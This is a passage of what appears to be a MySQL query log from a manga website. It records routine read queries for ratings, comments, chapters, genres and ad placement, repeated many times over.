count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330661359 Quit 330661360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330661360 Quit 330661361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330661361 Quit 330661362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330661362 Quit 330661363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330661363 Quit 330661364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330661364 Quit 330661365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330661365 Quit 330661366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330661366 Quit 330661367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330661367 Quit 330661368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330661368 Quit 330661369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330661369 Quit 330661370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330661370 Quit 330661371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330661371 Quit 330661372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330661372 Quit 330661373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330661373 Quit 330661374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330661374 Quit 330661375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330661375 Quit 330661376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330661376 Quit 330661377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330661377 Quit 330661378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330661378 Quit 330661379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330661379 Quit 330661380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330661380 Quit 330661381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330661381 Quit 330661382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330661382 Quit 330661383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330661383 Quit 330661384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330661384 Quit 330661385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330661385 Quit 330661386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330661386 Quit 330661387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330661387 Quit 330661388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330661388 Quit 330661389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330661389 Quit 330661390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330661390 Quit 330661391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330661391 Quit 330661392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330661392 Quit 330661393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330661393 Quit 330661394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330661394 Quit 330661395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330661395 Quit 330661396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330661396 Quit 330661397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330661397 Quit 330661398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330661398 Quit 330661399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330661399 Quit 330661400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330661400 Quit 330661401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330661401 Quit 330661402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330661402 Quit 330661403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330661403 Quit 330661404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330661404 Quit 330661405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330661405 Quit 330661406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330661406 Quit 330661407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330661407 Quit 330661408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330661408 Quit 330661409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330661409 Quit 330661410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330661410 Quit 330661411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330661411 Quit 330661412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330661412 Quit 330661413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330661413 Quit 330661414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330661414 Quit 330661415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330661415 Quit 330661416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330661416 Quit 330661417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330661417 Quit 330661418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330661418 Quit 330661419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330661419 Quit 330661420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330661420 Quit 330661421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330661421 Quit 330661422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330661422 Quit 330661423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330661423 Quit 330661424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330661424 Quit 330661425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330661425 Quit 330661426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330661426 Quit 330661427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330661427 Quit 330661428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330661428 Quit 330661429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330661429 Quit 330661430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330661430 Quit 330661431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330661431 Quit 330661432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330661432 Quit 330661433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330661433 Quit 330661434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330661434 Quit 330661435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330661435 Quit 330661436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330661436 Quit 330661437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330661437 Quit 330661438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330661438 Quit 330661439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330661439 Quit 330661440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330661440 Quit 330661441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330661441 Quit 330661442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330661442 Quit 330661443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330661443 Quit 330661444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330661444 Quit 330661445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330661445 Quit 330661446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330661446 Quit 330661447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330661447 Quit 330661448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330661448 Quit 330661449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330661449 Quit 330661450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330661450 Quit 330661451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330661451 Quit 330661452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330661452 Quit 330661453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330661453 Quit 330661454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330661454 Quit 330661455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330661455 Quit 330661456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330661456 Quit 330661457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330661457 Quit 330661458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330661458 Quit 330661459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330661459 Quit 330661460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330661460 Quit 330661461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330661461 Quit 330661462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330661462 Quit 330661463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330661463 Quit 330661464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330661464 Quit 330661465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330661465 Quit 330661466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330661466 Quit 330661467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330661467 Quit 330661468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330661468 Quit 330661469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330661469 Quit 330661470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330661470 Quit 330661471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330661471 Quit 330661472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330661472 Quit 330661473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330661473 Quit 330661474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330661474 Quit 330661475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330661475 Quit 330661476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330661476 Quit 330661477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330661477 Quit 330661478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330661478 Quit 330661479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330661479 Quit 330661480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330661480 Quit 330661481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330661481 Quit 330661482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330661482 Quit 330661483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330661483 Quit 330661484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330661484 Quit 330661485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330661485 Quit 330661486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330661486 Quit 330661487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330661487 Quit 330661488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330661488 Quit 330661489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330661489 Quit 330661490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330661490 Quit 330661491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330661491 Quit 330661492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330661492 Quit 330661493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330661493 Quit 330661494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330661494 Quit 330661495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330661495 Quit 330661496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330661496 Quit 330661497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330661497 Quit 330661498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330661498 Quit 330661499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661499 Quit 330661500 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661500 Quit 330660788 Quit 330661501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661501 Query select * FROM comments where manga_id = '35' and parent_id is null order by created desc 330661501 Quit 330661502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661502 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330661502 Quit 330661503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661503 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Drama%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Shoujo%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330661503 Quit 330661504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661504 Quit 330661505 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661505 Quit 330661506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330661506 Quit 330661507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661507 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330661507 Quit 330661508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661508 Query select * FROM comments where parent_id = '1106' 330661508 Quit 330661509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661509 Query select * FROM comments where parent_id = '1107' 330661509 Quit 330661510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661510 Query select * FROM comments where parent_id = '1108' 330661510 Quit 330661511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661511 Query select * FROM comments where parent_id = '1109' 330661511 Quit 330661512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661512 Query select * FROM comments where parent_id = '1105' 330661512 Quit 330661513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661513 Query select * FROM comments where parent_id = '1103' 